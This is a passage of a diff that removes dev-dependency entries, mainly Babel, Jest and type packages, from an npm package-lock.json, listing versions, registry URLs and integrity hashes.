"@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-typescript": { - "version": "7.20.0", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.20.0.tgz", - "integrity": "sha512-rd9TkG+u1CExzS4SM1BlMEhMXwFLKVjOAFFCDx9PbX5ycJWDoWMcwdJH9RhkPu1dOgn5TrxLot/Gx6lWFuAUNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.19.0" - } - }, - "@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" - } - }, - "@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - } - }, - "@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, - "requires": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - } - }, - "@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "requires": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - } - }, - "@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true - }, - "@jest/console": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.4.1.tgz", - "integrity": "sha512-m+XpwKSi3PPM9znm5NGS8bBReeAJJpSkL1OuFCqaMaJL2YX9YXLkkI+MBchMPwu+ZuM2rynL51sgfkQteQ1CKQ==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "slash": "^3.0.0" - } - }, - "@jest/core": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.4.1.tgz", - "integrity": "sha512-RXFTohpBqpaTebNdg5l3I5yadnKo9zLBajMT0I38D0tDhreVBYv3fA8kywthI00sWxPztWLD3yjiUkewwu/wKA==", - "dev": true, - "requires": { - "@jest/console": "^29.4.1", - "@jest/reporters": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.4.0", - "jest-config": "^29.4.1", - "jest-haste-map": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-resolve-dependencies": "^29.4.1", - "jest-runner": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "jest-watcher": "^29.4.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - } - }, - "@jest/environment": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.4.1.tgz", - "integrity": "sha512-pJ14dHGSQke7Q3mkL/UZR9ZtTOxqskZaC91NzamEH4dlKRt42W+maRBXiw/LWkdJe+P0f/zDR37+SPMplMRlPg==", - "dev": true, - "requires": { - "@jest/fake-timers": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-mock": "^29.4.1" - } - }, - "@jest/expect": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.4.1.tgz", - "integrity": "sha512-ZxKJP5DTUNF2XkpJeZIzvnzF1KkfrhEF6Rz0HGG69fHl6Bgx5/GoU3XyaeFYEjuuKSOOsbqD/k72wFvFxc3iTw==", - "dev": true, - "requires": { - "expect": "^29.4.1", - "jest-snapshot": "^29.4.1" - } - }, - "@jest/expect-utils": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.4.1.tgz", - "integrity": "sha512-w6YJMn5DlzmxjO00i9wu2YSozUYRBhIoJ6nQwpMYcBMtiqMGJm1QBzOf6DDgRao8dbtpDoaqLg6iiQTvv0UHhQ==", - "dev": true, - "requires": { - "jest-get-type": "^29.2.0" - } - }, - "@jest/fake-timers": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.4.1.tgz", - "integrity": "sha512-/1joI6rfHFmmm39JxNfmNAO3Nwm6Y0VoL5fJDy7H1AtWrD1CgRtqJbN9Ld6rhAkGO76qqp4cwhhxJ9o9kYjQMw==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.4.1", - "jest-mock": "^29.4.1", - "jest-util": "^29.4.1" - } - }, - "@jest/globals": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.4.1.tgz", - "integrity": "sha512-znoK2EuFytbHH0ZSf2mQK2K1xtIgmaw4Da21R2C/NE/+NnItm5mPEFQmn8gmF3f0rfOlmZ3Y3bIf7bFj7DHxAA==", - "dev": true, - "requires": { - "@jest/environment": "^29.4.1", - "@jest/expect": "^29.4.1", - "@jest/types": "^29.4.1", - "jest-mock": "^29.4.1" - } - }, - "@jest/reporters": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.4.1.tgz", - "integrity": "sha512-AISY5xpt2Xpxj9R6y0RF1+O6GRy9JsGa8+vK23Lmzdy1AYcpQn5ItX79wJSsTmfzPKSAcsY1LNt/8Y5Xe5LOSg==", - "dev": true, - "requires": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - } - }, - "@jest/schemas": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.4.0.tgz", - "integrity": "sha512-0E01f/gOZeNTG76i5eWWSupvSHaIINrTie7vCyjiYFKgzNdyEGd12BUv4oNBFHOqlHDbtoJi3HrQ38KCC90NsQ==", - "dev": true, - "requires": { - "@sinclair/typebox": "^0.25.16" - } - }, - "@jest/source-map": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.2.0.tgz", - "integrity": "sha512-1NX9/7zzI0nqa6+kgpSdKPK+WU1p+SJk3TloWZf5MzPbxri9UEeXX5bWZAPCzbQcyuAzubcdUHA7hcNznmRqWQ==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.15", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.4.1.tgz", - "integrity": "sha512-WRt29Lwt+hEgfN8QDrXqXGgCTidq1rLyFqmZ4lmJOpVArC8daXrZWkWjiaijQvgd3aOUj2fM8INclKHsQW9YyQ==", - "dev": true, - "requires": { - "@jest/console": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/test-sequencer": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.4.1.tgz", - "integrity": "sha512-v5qLBNSsM0eHzWLXsQ5fiB65xi49A3ILPSFQKPXzGL4Vyux0DPZAIN7NAFJa9b4BiTDP9MBF/Zqc/QA1vuiJ0w==", - "dev": true, - "requires": { - "@jest/test-result": "^29.4.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "slash": "^3.0.0" - } - }, - "@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - } - }, - "@jest/types": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.4.1.tgz", - "integrity": "sha512-zbrAXDUOnpJ+FMST2rV7QZOgec8rskg2zv8g2ajeqitp4tvZiyqTCYXANrKsM+ryj5o+LI+ZN2EgU9drrkiwSA==", - "dev": true, - "requires": { - "@jest/schemas": "^29.4.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@jridgewell/gen-mapping": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.1.1.tgz", - "integrity": "sha512-sQXCasFk+U8lWYEe66WxRDOE9PjVz4vSM51fTu3Hw+ClTpUSQb718772vH3pyS5pShp6lvQM7SxgIDXXXmOX7w==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.0.0", - "@jridgewell/sourcemap-codec": "^1.4.10" - } - }, - "@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true - }, - "@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true - }, - "@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "@jridgewell/trace-mapping": { - "version": "0.3.17", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.17.tgz", - "integrity": "sha512-MCNzAp77qzKca9+W/+I0+sEpaUnZoeasnghNeVc41VZCEKaCH73Vq3BZZ/SzWIgrqE4H4ceI+p+b6C0mHf9T4g==", - "dev": true, - "requires": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - } - }, - "@sinclair/typebox": { - "version": "0.25.21", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.25.21.tgz", - "integrity": "sha512-gFukHN4t8K4+wVC+ECqeqwzBDeFeTzBXroBTqE6vcWrQGbEUpHO7LYdG0f4xnvYq4VOEwITSlHlp0JBAIFMS/g==", - "dev": true - }, - "@sinonjs/commons": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-2.0.0.tgz", - "integrity": "sha512-uLa0j859mMrg2slwQYdO/AkrOfmH+X6LTVmNTS9CqexuE2IvVORIkSpJLqePAbEnKJ77aMmCwr1NUZ57120Xcg==", - "dev": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "10.0.2", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.0.2.tgz", - "integrity": "sha512-SwUDyjWnah1AaNl7kxsa7cfLhlTYoiyhDAIgyh+El30YvXs/o7OLXpYH88Zdhyx9JExKrmHDJ+10bwIcY80Jmw==", - "dev": true, - "requires": { - "@sinonjs/commons": "^2.0.0" - } - }, - "@types/babel__core": { - "version": "7.20.0", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.0.tgz", - "integrity": "sha512-+n8dL/9GWblDO0iU6eZAwEIJVr5DWigtle+Q6HLOrh/pdbXOhOtqzq8VPPE2zvNJzSKY4vH/z3iT3tn0A3ypiQ==", - "dev": true, - "requires": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "requires": { - "@babel/types": "^7.0.0" - } - }, - "@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "@types/babel__traverse": { - "version": "7.18.3", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.18.3.tgz", - "integrity": "sha512-1kbcJ40lLB7MHsj39U4Sh1uTd2E7rLEa79kmDpI6cy+XiXsteB3POdQomoq4FxszMrO3ZYchkhYJw7A2862b3w==", - "dev": true, - "requires": { - "@babel/types": "^7.3.0" - } - }, - "@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "requires": { - "@types/istanbul-lib-coverage": "*" - } - }, - "@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "requires": { - "@types/istanbul-lib-report": "*" - } - }, - "@types/jest": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.4.0.tgz", - "integrity": "sha512-VaywcGQ9tPorCX/Jkkni7RWGFfI11whqzs8dvxF41P17Z+z872thvEvlIbznjPJ02kl1HMX3LmLOonsj2n7HeQ==", - "dev": true, - "requires": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "@types/node": { - "version": "18.11.18", - "resolved": "https://registry.npmjs.org/@types/node/-/node-18.11.18.tgz", - "integrity": "sha512-DHQpWGjyQKSHj3ebjFI/wRKcqQcdR+MoFBygntYOZytCqNfkd2ZC4ARDJ2DQqhjH5p85Nnd3jhUJIXrszFX/JA==", - "dev": true - }, - "@types/prettier": { - "version": "2.7.2", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.2.tgz", - "integrity": "sha512-KufADq8uQqo1pYKVIYzfKbJfBAc0sOeXqGbFaSpv8MRmC/zXgowNZmFcbngndGk922QDmOASEXUZCaY48gs4cg==", - "dev": true - }, - "@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "@types/yargs": { - "version": "17.0.22", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.22.tgz", - "integrity": "sha512-pet5WJ9U8yPVRhkwuEIp5ktAeAqRZOq4UdAyWLWzxbtpyXnzbtLdKiXAjJzi/KLmPGS9wk86lUFWZFN6sISo4g==", - "dev": true, - "requires": { - "@types/yargs-parser": "*" - } - }, - "@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "requires": { - "type-fest": "^0.21.3" - } - }, - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "requires": { - "color-convert": "^2.0.1" - } - }, - "anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "requires": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - } - }, - "argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "requires": { - "sprintf-js": "~1.0.2" - } - }, - "babel-jest": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.4.1.tgz", - "integrity": "sha512-xBZa/pLSsF/1sNpkgsiT3CmY7zV1kAsZ9OxxtrFqYucnOuRftXAfcJqcDVyOPeN4lttWTwhLdu0T9f8uvoPEUg==", - "dev": true, - "requires": { - "@jest/transform": "^29.4.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.4.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - } - }, - "babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - } - }, - "babel-plugin-jest-hoist": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.4.0.tgz", - "integrity": "sha512-a/sZRLQJEmsmejQ2rPEUe35nO1+C9dc9O1gplH1SXmJxveQSRUYdBk8yGZG/VOUuZs1u2aHZJusEGoRMbhhwCg==", - "dev": true, - "requires": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - } - }, - "babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "requires": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - } - }, - "babel-preset-jest": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.4.0.tgz", - "integrity": "sha512-fUB9vZflUSM3dO/6M2TCAepTzvA4VkOvl67PjErcrQMGt9Eve7uazaeyCZ2th3UtI7ljpiBJES0F7A1vBRsLZA==", - "dev": true, - "requires": { - "babel-plugin-jest-hoist": "^29.4.0", - "babel-preset-current-node-syntax": "^1.0.0" - } - }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "braces": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.2.tgz", - "integrity": "sha512-b8um+L1RzM3WDSzvhm6gIz1yfTbBt6YTlcEKAvsmqCZZFw46z626lVj9j1yEPW33H5H+lBQpZMP1k8l+78Ha0A==", - "dev": true, - "requires": { - "fill-range": "^7.0.1" - } - }, - "browserslist": { - "version": "4.21.5", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.5.tgz", - "integrity": 